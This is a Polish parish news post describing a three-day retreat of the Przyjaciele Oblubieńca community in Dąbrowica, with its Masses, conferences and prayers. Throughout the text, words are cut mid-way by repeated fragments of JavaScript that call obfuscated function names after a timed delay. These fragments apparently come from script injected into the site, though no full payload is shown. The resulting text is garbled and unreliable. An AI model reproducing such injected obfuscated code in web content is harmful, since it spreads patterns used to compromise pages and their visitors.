wstazka
Kościół Świętego Ducha
Strona główna -> Aktualności z Centrum
Wpisał:adminicdmstracja Data: 17-04-2013
ikona

Rekolekcje Wspólnoty Przyjaciół Oblubieńca

W dniu 12 kwietnia, rozpoczęły się rekolekcje dla wspólnot Przyjaciół Oblubieńca formujących się przy parafii św. Maksymiliana oraz św. Ducha w Lublinie. 140 osób zgromadziło się Dąbrowicy, by zgłębiać temat wspólnoty jaką tworzymy, nawiązać relację między naszymi wspólnotami, a także by dowiedzieć się, czym tak naprawdę jest wspólnota Przyjaciele Oblubieńca.

Pierwszego dnia rekolekcji, uczestniczyliśmy w Eucharystii, której przewodniczył ks. Józef Hałabis – pasterz odpowiedzialny za wspólnotę z parafii św. Maksymiliana. Przybliżył nam on, Boga jako Ojca, który poprzez wspólnotę chcę nas prowadzić do siebie. Tego dnia adorowaliśmy także naszego Oblubieńca, by w ciszy naszych serc słuchać Jego głosu.

Drugi dzień rekolekcji, rozpoczęliśmy modlitwą osobistą, po której wspólnie włączyliśmy się w modlitwę Kościoła powszechnego, modląc się jutrznią. W ciągu tego dnia wysłuchaliśmy trzech konferencji, wygłoszonych przez. Ks. Krzyszandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tofa Kralkę SAC – założyciela wspólnoty. Po każdej konferencji, mieliśmy okazję zadać pytanie dotyczące naszej wspólnoty, w nawiązaniu do wysłuchanych słów. Pierwsza konferencja dotyczyła informacji o tym, jakie wspólnoty istnieją w kościele, jak powstawały te wspólnoty, oraz jaka jest ich misja w kościele. Po tym wprowadzeniu dowiedzieliśmy się, jak wygląda nasza wspólnota na tle innych w Kościele, w czym jesteśmy podobni do nich, a także co nas odróżnia. Druga konferencja wprowadziła nas w hisandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}torię powstania wspólnoty, jej cele, misję, strategie działania. Przed trzecią konferencją, która miała miejsce o godzinie 15.30, spotkaliśmy się by razem pomodlić się koronką do Bożego Miłosierdzia. Po naszej wspólnoandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towej modlitwie, nastąpiła ostatnia w tym dniu konferencja, która pokazała nam jakie zadanie ma wspólnota Przyjaciół Oblubieńca w Kościele, jaka jest struktura wspólnoty, jak wiele wspólnot działa w Polsce. W tej konferencji zostały poruszane także kwestie prawnego istnienia wspólnoty oraz jej status finansowy. W przerwie pomiędzy konferencjami posililiśmy się „małym co nie co” a czasie kawowych przerw, a także przepysznym obiadem. Po przerwie, zebraliśmy się w kaplicy, by wraz z całym kościołem modlić się Liturgią godzin. Po tak intensywnym czasie, zjedliśmy kolację, by móc w pełni uczestniczyć w kolejnych punktach programu, w tym dniu najważniejszych. Tego dnia Eucharystię celebrował założyciel naszej wspólnoty, który w kazaniu, podzielił się z nami swoim refleksjami, na temat bycia we wspólnocie. Wspólnota została porównana do łodzi, którą płyniemy razem, by dobić do bezpiecznego brzegu. Bezpośrednio po Eucharystii rozpoczęliśmy modlitwę uwielbienia, która została poprowadzona przez Justynę Dajer i Martę Mendrek – administraandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}torki obu wspólnot, a także Ewę Adamowicz – moderaandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tora regionu lubelskiego wspólnot Przyjaciele Oblubieńca. Modlitwa ta, na nowo obudziła w nas Zmartwychwstałego Jezusa, który z wielką mocą przechodził się pośród nas i obdarowywał nas swoją miłością i pokojem. W ten sposób zakończyliśmy dzień drugi.

Dzień trzeci był ostatnim dniem naszych rekolekcji. Poza oczywistymi sprawami, jak śniadanie i obiad, w tym dniu, swój czas przeznaczyliśmy na modlitwę osobistą, modlitwę brewiarzową, a także centrum naszego życia – Eucharystię. Tej Eucharystii przewodniczył ks. Grzegorz Ogorzałek – pasterz wspólnoty przy kościele Ducha Św. W kazaniu nakreślił nam postać Piotra – pierwszego papieża, który został wybrany na przywódcę Kościoła, mimo zaparcia się Jezusa, mimo jego porywczego charakteru. I my, tak jak Piotr, mamy głosić Chrystusa w mocy Ducha Świętego, choć nie unikniemy chwil ciężkich, gdzie podwinie nam się noga. Po Eucharystii, zjedliśmy obiad i około godziny 14 wyjechaliśmy, już powoli zaczynając tęsknić za wspólnie spędzonym czasem.

„Abyśmy byli jedno”- każda osoba, która tam była, właśnie tego doświadczyła. Zjednoczeni mocą Ducha Świętego, będąc w jednej wspólnocie, idziemy w tym samym kierunku – Boga – naszego Ojca, który dał mam misję by głosić Dobrą Nowinę w Kościele Jezusa Chrystusa.

 

 

 

Podziel się na:

Komentarze
Przejdź do:
aktualności dla ducha video